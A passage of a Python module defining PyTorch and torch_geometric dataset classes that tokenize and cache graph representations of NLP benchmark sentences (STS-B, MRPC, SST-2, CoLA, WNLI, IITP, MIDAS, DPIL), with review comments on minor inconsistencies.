    Each item is the (input_ids, token_type_ids, attention_mask) encoding of
    the lower-cased sentence pair, padded/truncated to ``max_length``.
    """
    max_length = 127
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding target must fit within the tokenizer's own limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        # Diagnostic scan: report the longest encoded pair in the frame.
        print(f'Computing max length (sub-word + special tokens) on STS_B dataset')
        longest = 0
        total_rows = self.data_frame.shape[0]
        for _, row in tqdm(self.data_frame.iterrows(), total=total_rows):
            encoded = self.tokenizer.encode(row['sent_a'].lower(), row['sent_b'].lower(), add_special_tokens=True)
            longest = max(longest, len(encoded))
        # Clamp to the tokenizer's hard limit before reporting.
        max_length = min(longest, self.tokenizer.model_max_length)
        print(f'Max length (sub-word + special tokens) on STS_B dataset: {max_length}')
    def __len__(self):
        # One example per data-frame row.
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        row = self.data_frame.iloc[idx, :]
        pair = [row['sent_a'].lower(), row['sent_b'].lower()]
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, pair, self.max_length)
        return input_ids, token_type_ids, attention_mask
class STS_BAuxDataset(GraphDataset):
    """Graph-side (auxiliary) view of the STS-B data for torch_geometric.

    Builds one `Data` object per row — for the sentence selected by the
    `is_sentence_*` flag — and caches it as `aux_{1|2}_{row}.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # NOTE(review): attributes must be assigned before super().__init__(),
        # which is expected to consult processed_file_names/process() — confirm
        # against the installed torch_geometric version.
        self.data_frame = data_frame
        self.DT_G = DT_G
        # Exactly one of the two sentence flags must be set.
        assert(sum([is_sentence_1, is_sentence_2]) == 1)
        self.is_sentence_1 = is_sentence_1
        self.is_sentence_2 = is_sentence_2
        super(STS_BAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed STS_B dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: graphs are built directly from the data frame.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row; the prefix encodes which sentence this is.
        if(self.is_sentence_1):
            return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
        elif(self.is_sentence_2):
            return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        # Build and persist one graph Data object per data-frame row.
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            # Regression target: the float similarity score.
            score = row['score_f']
            if(self.is_sentence_1):
                context = row['sent_a']
            elif(self.is_sentence_2):
                context = row['sent_b']
            context = context.lower()
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # NOTE(review): unlike WiC/RTE, 'y' is not moved to config.device
            # here — confirm whether that is intended.
            data['y'] = utils.get_score_embedding(score)
            data['sentence'] = context
            # One node per whitespace-separated token.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            if(self.is_sentence_1):
                torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
            elif(self.is_sentence_2):
                torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
    def len(self):
        return len(self.processed_file_names)
    def get(self, idx):
        # Load the cached graph for the sentence selected at construction.
        if(self.is_sentence_1):
            data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        elif(self.is_sentence_2):
            data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
        return data
class MRPCLMDataset(Dataset):
    """MRPC paraphrase sentence pairs encoded for a transformer LM.

    Each item is the (input_ids, token_type_ids, attention_mask) encoding of
    the lower-cased sentence pair, padded/truncated to ``max_length``.
    """
    max_length = 139
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding target must fit within the tokenizer's own limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        # Diagnostic scan: report the longest encoded pair in the frame.
        print(f'Computing max length (sub-word + special tokens) on MRPC dataset')
        longest = 0
        total_rows = self.data_frame.shape[0]
        for _, row in tqdm(self.data_frame.iterrows(), total=total_rows):
            encoded = self.tokenizer.encode(row['#1 String'].lower(), row['#2 String'].lower(), add_special_tokens=True)
            longest = max(longest, len(encoded))
        # Clamp to the tokenizer's hard limit before reporting.
        max_length = min(longest, self.tokenizer.model_max_length)
        print(f'Max length (sub-word + special tokens) on MRPC dataset: {max_length}')
    def __len__(self):
        # One example per data-frame row.
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        row = self.data_frame.iloc[idx, :]
        pair = [row['#1 String'].lower(), row['#2 String'].lower()]
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, pair, self.max_length)
        return input_ids, token_type_ids, attention_mask
class MRPCAuxDataset(GraphDataset):
    """Graph-side (auxiliary) view of the MRPC data for torch_geometric.

    Builds one `Data` object per row — for the sentence selected by the
    `is_sentence_*` flag — and caches it as `aux_{1|2}_{row}.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # NOTE(review): attributes must be assigned before super().__init__(),
        # which is expected to consult processed_file_names/process() — confirm
        # against the installed torch_geometric version.
        self.data_frame = data_frame
        self.DT_G = DT_G
        # Exactly one of the two sentence flags must be set.
        assert(sum([is_sentence_1, is_sentence_2]) == 1)
        self.is_sentence_1 = is_sentence_1
        self.is_sentence_2 = is_sentence_2
        super(MRPCAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed MRPC dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: graphs are built directly from the data frame.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row; the prefix encodes which sentence this is.
        if(self.is_sentence_1):
            return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
        elif(self.is_sentence_2):
            return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        # Build and persist one graph Data object per data-frame row.
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            # 'Quality' is MRPC's paraphrase label column.
            label = row['Quality']
            if(self.is_sentence_1):
                context = row['#1 String']
            elif(self.is_sentence_2):
                context = row['#2 String']
            context = context.lower()
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            data['y'] = utils.get_label_embedding(label, config.MRPC_labels).to(config.device)
            data['sentence'] = context
            # One node per whitespace-separated token.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            if(self.is_sentence_1):
                torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
            elif(self.is_sentence_2):
                torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
    def len(self):
        return len(self.processed_file_names)
    def get(self, idx):
        # Load the cached graph for the sentence selected at construction.
        if(self.is_sentence_1):
            data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        elif(self.is_sentence_2):
            data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
        return data
class SST_2LMDataset(Dataset):
    """SST-2 single sentences encoded for a transformer LM.

    Each item is the (input_ids, token_type_ids, attention_mask) encoding of
    the lower-cased sentence, padded/truncated to ``max_length``.
    """
    max_length = 81
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding target must fit within the tokenizer's own limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        # Diagnostic scan: report the longest encoded sentence in the frame.
        print(f'Computing max length (sub-word + special tokens) on SST_2 dataset')
        longest = 0
        total_rows = self.data_frame.shape[0]
        for _, row in tqdm(self.data_frame.iterrows(), total=total_rows):
            encoded = self.tokenizer.encode(row['sentence'].lower(), add_special_tokens=True)
            longest = max(longest, len(encoded))
        # Clamp to the tokenizer's hard limit before reporting.
        max_length = min(longest, self.tokenizer.model_max_length)
        print(f'Max length (sub-word + special tokens) on SST_2 dataset: {max_length}')
    def __len__(self):
        # One example per data-frame row.
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        row = self.data_frame.iloc[idx, :]
        single = [row['sentence'].lower()]
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, single, self.max_length)
        return input_ids, token_type_ids, attention_mask
class SST_2AuxDataset(GraphDataset):
    """Graph-side (auxiliary) view of the SST-2 data for torch_geometric.

    Single-sentence task: only sentence 1 exists, so each row is cached as
    `aux_1_{row}.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: callers must pass is_sentence_1=True only.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # NOTE(review): attributes must be assigned before super().__init__(),
        # which is expected to consult processed_file_names/process() — confirm
        # against the installed torch_geometric version.
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(SST_2AuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed SST_2 dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: graphs are built directly from the data frame.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        # Build and persist one graph Data object per data-frame row.
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            context = row['sentence'].lower()
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # NOTE(review): 'y' is not moved to config.device here, unlike
            # WiC/RTE — confirm whether that is intended.
            data['y'] = utils.get_label_embedding(label, config.SST_2_labels)
            data['sentence'] = context
            # One node per whitespace-separated token.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        return len(self.processed_file_names)
    def get(self, idx):
        # Load the cached graph for row idx.
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class CoLA_LMDataset(Dataset):
    """CoLA single sentences encoded for a transformer LM.

    Each item is the (input_ids, token_type_ids, attention_mask) encoding of
    the lower-cased sentence, padded/truncated to ``max_length``.
    """
    max_length = 48
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding target must fit within the tokenizer's own limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        # Diagnostic scan: report the longest encoded sentence in the frame.
        # Bug fix: both messages previously said "SST_2 dataset" (copy-paste
        # from SST_2LMDataset) — this is the CoLA dataset.
        print(f'Computing max length (sub-word + special tokens) on CoLA dataset')
        max_length = 0
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            sentence_1 = row['sentence'].lower()
            input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
            max_length = max(max_length, len(input_ids))
        # Clamp to the tokenizer's hard limit before reporting.
        max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
        print(f'Max length (sub-word + special tokens) on CoLA dataset: {max_length}')
    def __len__(self):
        # One example per data-frame row.
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        row = self.data_frame.iloc[idx, :]
        sentence_1 = row['sentence'].lower()
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
        return input_ids, token_type_ids, attention_mask
class CoLAAuxDataset(GraphDataset):
    """Graph-side (auxiliary) view of the CoLA data for torch_geometric.

    Single-sentence task: only sentence 1 exists, so each row is cached as
    `aux_1_{row}.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: callers must pass is_sentence_1=True only.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # NOTE(review): attributes must be assigned before super().__init__(),
        # which is expected to consult processed_file_names/process() — confirm
        # against the installed torch_geometric version.
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(CoLAAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed CoLA dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: graphs are built directly from the data frame.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        # Build and persist one graph Data object per data-frame row.
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            context = row['sentence'].lower()
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # NOTE(review): 'y' is not moved to config.device here, unlike
            # WiC/RTE — confirm whether that is intended.
            data['y'] = utils.get_label_embedding(label, config.CoLA_labels)
            data['sentence'] = context
            # One node per whitespace-separated token.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        return len(self.processed_file_names)
    def get(self, idx):
        # Load the cached graph for row idx.
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class WNLI_TranslatedLMDataset(Dataset):
    """WNLI (translated) sentence pairs encoded for a transformer LM.

    Each item is the (input_ids, token_type_ids, attention_mask) encoding of
    the sentence pair, padded/truncated to ``max_length``. Note: unlike the
    English datasets, the text is not lower-cased here.
    """
    max_length = 171
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding target must fit within the tokenizer's own limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        # Diagnostic scan: report the longest encoded pair in the frame.
        # Bug fix: both messages previously misspelled the dataset as
        # "WLNI_Translated".
        print(f'Computing max length (sub-word + special tokens) on WNLI_Translated dataset')
        max_length = 0
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            sentence_1 = row['sentence1']
            sentence_2 = row['sentence2']
            input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
            max_length = max(max_length, len(input_ids))
        # Clamp to the tokenizer's hard limit before reporting.
        max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
        print(f'Max length (sub-word + special tokens) on WNLI_Translated dataset: {max_length}')
    def __len__(self):
        # One example per data-frame row.
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        row = self.data_frame.iloc[idx, :]
        sentence_1 = row['sentence1']
        sentence_2 = row['sentence2']
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
        return input_ids, token_type_ids, attention_mask
class WNLI_TranslatedAuxDataset(GraphDataset):
    """Graph-side (auxiliary) view of the translated WNLI data.

    Builds one `Data` object per row — for the sentence selected by the
    `is_sentence_*` flag — and caches it as `aux_{1|2}_{row}.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # NOTE(review): attributes must be assigned before super().__init__(),
        # which is expected to consult processed_file_names/process() — confirm
        # against the installed torch_geometric version.
        self.data_frame = data_frame
        self.DT_G = DT_G
        # Exactly one of the two sentence flags must be set.
        assert(sum([is_sentence_1, is_sentence_2]) == 1)
        self.is_sentence_1 = is_sentence_1
        self.is_sentence_2 = is_sentence_2
        super(WNLI_TranslatedAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed WNLI_Translated Aux dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: graphs are built directly from the data frame.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row; the prefix encodes which sentence this is.
        if(self.is_sentence_1):
            return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
        elif(self.is_sentence_2):
            return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        # Build and persist one graph Data object per data-frame row.
        # NOTE(review): unlike the English datasets, the context is NOT
        # lower-cased here — presumably deliberate for translated text; confirm.
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            if(self.is_sentence_1):
                context = row['sentence1']
            elif(self.is_sentence_2):
                context = row['sentence2']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            data['y'] = utils.get_label_embedding(label, config.WNLI_translated_labels).to(config.device)
            data['sentence'] = context
            # One node per whitespace-separated token.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            if(self.is_sentence_1):
                torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
            elif(self.is_sentence_2):
                torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
    def len(self):
        return len(self.processed_file_names)
    def get(self, idx):
        # Load the cached graph for the sentence selected at construction.
        if(self.is_sentence_1):
            data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        elif(self.is_sentence_2):
            data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
        return data
class IITP_Product_ReviewsLMDataset(Dataset):
    """IITP product-review sentences encoded for a transformer LM.

    Each item is the (input_ids, token_type_ids, attention_mask) encoding of
    the sentence, padded/truncated to ``max_length``. The text is used as-is
    (no lower-casing).
    """
    max_length = 179
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding target must fit within the tokenizer's own limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        # Diagnostic scan: report the longest encoded sentence in the frame.
        print(f'Computing max length (sub-word + special tokens) on IITP_Product_Reviews dataset')
        longest = 0
        total_rows = self.data_frame.shape[0]
        for _, row in tqdm(self.data_frame.iterrows(), total=total_rows):
            encoded = self.tokenizer.encode(row['sentence'], add_special_tokens=True)
            longest = max(longest, len(encoded))
        # Clamp to the tokenizer's hard limit before reporting.
        max_length = min(longest, self.tokenizer.model_max_length)
        print(f'Max length (sub-word + special tokens) on IITP_Product_Reviews dataset: {max_length}')
    def __len__(self):
        # One example per data-frame row.
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        row = self.data_frame.iloc[idx, :]
        single = [row['sentence']]
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, single, self.max_length)
        return input_ids, token_type_ids, attention_mask
class IITP_Product_ReviewsAuxDataset(GraphDataset):
    """Graph-side (auxiliary) view of the IITP product-review data.

    Single-sentence task: only sentence 1 exists, so each row is cached as
    `aux_1_{row}.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: callers must pass is_sentence_1=True only.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # NOTE(review): attributes must be assigned before super().__init__(),
        # which is expected to consult processed_file_names/process() — confirm
        # against the installed torch_geometric version.
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(IITP_Product_ReviewsAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed IITP_Product_Reviews dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: graphs are built directly from the data frame.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        # Build and persist one graph Data object per data-frame row.
        # Context is used as-is (no lower-casing), matching the LM dataset.
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            context = row['sentence']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # NOTE(review): 'y' is not moved to config.device here, unlike
            # WiC/RTE — confirm whether that is intended.
            data['y'] = utils.get_label_embedding(label, config.IITP_product_reviews_labels)
            data['sentence'] = context
            # One node per whitespace-separated token.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        return len(self.processed_file_names)
    def get(self, idx):
        # Load the cached graph for row idx.
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class MIDAS_DiscourseLMDataset(Dataset):
    """MIDAS discourse-mode sentences (JSON records) encoded for a transformer LM.

    Each item is the (input_ids, token_type_ids, attention_mask) encoding of
    the record's sentence, padded/truncated to ``max_length``. The text is
    used as-is (no lower-casing).
    """
    max_length = 321
    def __init__(self, json_data, tokenizer):
        self.data = json_data
        self.tokenizer = tokenizer
        # The fixed padding target must fit within the tokenizer's own limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        # Diagnostic scan: report the longest encoded sentence in the data.
        print(f'Computing max length (sub-word + special tokens) on MIDAS_DiscourseLMDataset dataset')
        longest = 0
        for _, record in tqdm(enumerate(self.data), total=len(self.data)):
            encoded = self.tokenizer.encode(record['Sentence'], add_special_tokens=True)
            longest = max(longest, len(encoded))
        # Clamp to the tokenizer's hard limit before reporting.
        max_length = min(longest, self.tokenizer.model_max_length)
        print(f'Max length (sub-word + special tokens) on MIDAS_DiscourseLMDataset dataset: {max_length}')
    def __len__(self):
        # One example per JSON record.
        return len(self.data)
    def __getitem__(self, idx):
        record = self.data[idx]
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [record['Sentence']], self.max_length)
        return input_ids, token_type_ids, attention_mask
class MIDAS_DiscourseAuxDataset(GraphDataset):
    """Graph-side (auxiliary) view of the MIDAS discourse data.

    Single-sentence task over JSON records: each record is cached as
    `aux_1_{row}.pt` under `root`.
    """
    def __init__(self, root, json_data, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: callers must pass is_sentence_1=True only.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # NOTE(review): attributes must be assigned before super().__init__(),
        # which is expected to consult processed_file_names/process() — confirm
        # against the installed torch_geometric version.
        self.data = json_data
        self.DT_G = DT_G
        super(MIDAS_DiscourseAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed MIDAS_Discourse dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: graphs are built directly from the JSON records.
        return []
    @property
    def processed_file_names(self):
        # One cached file per record.
        return [f'aux_1_{i}.pt' for i in range(len(self.data))]
    def process(self):
        # Build and persist one graph Data object per JSON record.
        # Context is used as-is (no lower-casing), matching the LM dataset.
        for row_index, row in tqdm(enumerate(self.data), total=len(self.data)):
            label = row['Discourse Mode']
            context = row['Sentence']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # NOTE(review): 'y' is not moved to config.device here, unlike
            # WiC/RTE — confirm whether that is intended.
            data['y'] = utils.get_label_embedding(label, config.MIDAS_discourse_labels)
            data['sentence'] = context
            # One node per whitespace-separated token.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        return len(self.processed_file_names)
    def get(self, idx):
        # Load the cached graph for record idx.
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class DPIL_Subtask_1LMDataset(Dataset):
    """LM dataset for DPIL subtask 1: one encoded sentence pair per data-frame row."""
    # Pre-computed maximum sub-word length (incl. special tokens) for this corpus.
    max_length = 203
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # Fix: guard that the fixed padding length fits within the tokenizer's
        # limit, consistent with every other LM dataset in this file.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        """Scan the corpus and return the max encoded pair length, capped at the tokenizer limit."""
        print(f'Computing max length (sub-word + special tokens) on DPIL_Subtask_1 dataset')
        max_length = 0
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            sentence_1 = row['sentence_1']
            sentence_2 = row['sentence_2']
            input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
            max_length = max(max_length, len(input_ids))
        # Cap at the model's maximum supported sequence length.
        max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
        print(f'Max length (sub-word + special tokens) on DPIL_Subtask_1 dataset: {max_length}')
        # Fix: return the computed value instead of discarding it.
        return max_length
    def __len__(self):
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        """Return (input_ids, token_type_ids, attention_mask) for the pair at row `idx`."""
        row = self.data_frame.iloc[idx, :]
        sentence_1 = row['sentence_1']
        sentence_2 = row['sentence_2']
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
        return input_ids, token_type_ids, attention_mask
class DPIL_Subtask_1AuxDataset(GraphDataset):
    """Auxiliary graph dataset for DPIL subtask 1.

    Caches one graph per data-frame row, built from either sentence_1 or
    sentence_2 depending on which flag was set at construction time.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Attributes must exist before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        # Exactly one of the two sentence flags must be selected.
        assert(sum([is_sentence_1, is_sentence_2]) == 1)
        self.is_sentence_1 = is_sentence_1
        self.is_sentence_2 = is_sentence_2
        super(DPIL_Subtask_1AuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed DPIL_Subtask_1 Aux dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row; the prefix records which sentence was used.
        row_count = self.data_frame.shape[0]
        if(self.is_sentence_1):
            return [f'aux_1_{i}.pt' for i in range(row_count)]
        elif(self.is_sentence_2):
            return [f'aux_2_{i}.pt' for i in range(row_count)]
    def process(self):
        """Build and cache one graph per row for the selected sentence column."""
        row_total = self.data_frame.shape[0]
        for i, row in tqdm(self.data_frame.iterrows(), total=row_total):
            label = row['label']
            if(self.is_sentence_1):
                context = row['sentence_1']
            elif(self.is_sentence_2):
                context = row['sentence_2']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            graph = Data()
            graph['edge_index'] = edge_index.to(config.device)
            graph['edge_attr'] = edge_attr.to(config.device)
            graph['y'] = utils.get_label_embedding(label, config.DPIL_subtask_1_labels).to(config.device)
            graph['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            graph.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(graph)):
                continue
            if(self.pre_transform is not None):
                graph = self.pre_transform(graph)
            if(self.is_sentence_1):
                torch.save(graph, os.path.join(self.processed_dir, f'aux_1_{i}.pt'))
            elif(self.is_sentence_2):
                torch.save(graph, os.path.join(self.processed_dir, f'aux_2_{i}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph `idx` for the selected sentence."""
        if(self.is_sentence_1):
            path = os.path.join(self.processed_dir, f'aux_1_{idx}.pt')
        elif(self.is_sentence_2):
            path = os.path.join(self.processed_dir, f'aux_2_{idx}.pt')
        return torch.load(path)
class DPIL_Subtask_2LMDataset(Dataset):
    """LM dataset for DPIL subtask 2: one encoded sentence pair per data-frame row."""
    # Pre-computed maximum sub-word length (incl. special tokens) for this corpus.
    max_length = 210
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # Fix: guard that the fixed padding length fits within the tokenizer's
        # limit, consistent with every other LM dataset in this file.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        """Scan the corpus and return the max encoded pair length, capped at the tokenizer limit."""
        print(f'Computing max length (sub-word + special tokens) on DPIL_Subtask_2 dataset')
        max_length = 0
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            sentence_1 = row['sentence_1']
            sentence_2 = row['sentence_2']
            input_ids = self.tokenizer.encode(sentence_1, sentence_2, add_special_tokens=True)
            max_length = max(max_length, len(input_ids))
        # Cap at the model's maximum supported sequence length.
        max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
        print(f'Max length (sub-word + special tokens) on DPIL_Subtask_2 dataset: {max_length}')
        # Fix: return the computed value instead of discarding it.
        return max_length
    def __len__(self):
